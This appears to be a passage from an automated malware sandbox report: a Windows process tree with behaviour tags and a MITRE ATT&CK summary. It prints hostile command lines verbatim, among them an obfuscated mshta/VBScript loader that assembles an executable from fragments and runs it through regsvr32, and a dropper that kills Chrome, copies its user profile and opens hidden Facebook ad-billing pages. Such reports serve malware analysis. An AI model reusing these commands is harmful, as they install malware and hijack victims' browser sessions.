C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q/C cOpy /y "C:\Users\Admin\AppData\Local\Temp\qXK~CwG.exe" ..\qXK~CwG.exe&& START ..\QxK~CWG.EXe -PR0oRU_ZO88aZ9ZaPNxDj_e0zJ2xs & if "-PR0oRU_ZO88aZ9ZaPNxDj_e0zJ2xs "== "" for %u iN ("C:\Users\Admin\AppData\Local\Temp\qXK~CwG.exe") do taskkill -F -IM "%~Nxu"6⤵PID:5096
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpt: ClOSe ( creATEOBJeCt( "wscRipT.sHeLl" ). RUN ( "cmd.eXe /q /C ECHO %rANDom%> 36HXHC.dP & eCho | set /p = ""MZ"" > 56Iu6A6.Km & COpY /B /y 56IU6A6.kM +dI2GIR.Wt+ agANL.x + 49P5Ah.89M +_L7g.40 + kaZO.7sJ+ QG0L.RG + 36HXHC.Dp ..\kUYT9A4.G & dEL /q *&StaRt regsvr32 -u /s ..\kUYt9a4.G ",0 , tRUe ))5⤵PID:4252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C ECHO %rANDom%> 36HXHC.dP & eCho | set /p = "MZ" > 56Iu6A6.Km & COpY /B /y 56IU6A6.kM +dI2GIR.Wt+ agANL.x + 49P5Ah.89M +_L7g.40 + kaZO.7sJ+ QG0L.RG+ 36HXHC.Dp ..\kUYT9A4.G &dEL /q *&StaRt regsvr32 -u /s ..\kUYt9a4.G6⤵PID:3568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>56Iu6A6.Km"7⤵PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "7⤵PID:152
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -u /s ..\kUYt9a4.G7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:4744
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "216F.exe"4⤵
- Kills process with taskkill
PID:4668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2C5D.exeC:\Users\Admin\AppData\Local\Temp\2C5D.exe1⤵
- Drops Chrome extension
PID:1096 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:5512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:5152
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y2⤵
- Enumerates system info in registry
PID:5744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/2⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:2240 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff858ff4f50,0x7ff858ff4f60,0x7ff858ff4f703⤵PID:4228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2220 /prefetch:83⤵PID:1896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1744 /prefetch:83⤵PID:6060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1692 /prefetch:23⤵PID:156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:13⤵PID:6184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:13⤵PID:6176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵PID:6268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:13⤵PID:6260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:13⤵PID:6392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4612 /prefetch:83⤵PID:6836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3996 /prefetch:83⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5596 /prefetch:83⤵PID:3316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5352 /prefetch:83⤵PID:5260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5340 /prefetch:83⤵PID:6616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5320 /prefetch:83⤵PID:6632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5404 /prefetch:83⤵PID:6780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4804 /prefetch:83⤵PID:4128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5172 /prefetch:83⤵PID:6700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5596 /prefetch:83⤵PID:6720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5228 /prefetch:83⤵PID:5904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4688 /prefetch:83⤵PID:3784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:13⤵PID:4720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:13⤵PID:5544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3996 /prefetch:23⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1760 /prefetch:83⤵PID:6764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4824 /prefetch:83⤵PID:4260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5692 /prefetch:83⤵PID:5592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1360 /prefetch:83⤵PID:2296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5380 /prefetch:83⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1676,3688305879945830989,8586824067129279127,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5500 /prefetch:83⤵PID:6880
-
-
-
C:\Windows\SysWOW64\gmvupske\lakgljeh.exeC:\Windows\SysWOW64\gmvupske\lakgljeh.exe /d"C:\Users\Admin\AppData\Local\Temp\1911.exe"1⤵
- Suspicious use of SetThreadContext
PID:304 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\3DC3.exeC:\Users\Admin\AppData\Local\Temp\3DC3.exe1⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\3DC3.exe"C:\Users\Admin\AppData\Local\Temp\3DC3.exe"2⤵
- Modifies data under HKEY_USERS
PID:6116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 5602⤵
- Program crash
PID:1724
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2456
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3184
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4644
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5460
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:404 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:4804
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6524
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:6948
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:6752
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:304
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6820
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:5424
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4696
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:6096
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6652
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2100
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2652
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4348
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3368
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3f81⤵PID:2012
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3444
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1160
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2276
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:1116
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4984
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1272
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
BITS Jobs
1Disabling Security Tools
3File and Directory Permissions Modification
1Modify Registry
6Virtualization/Sandbox Evasion
2Web Service
1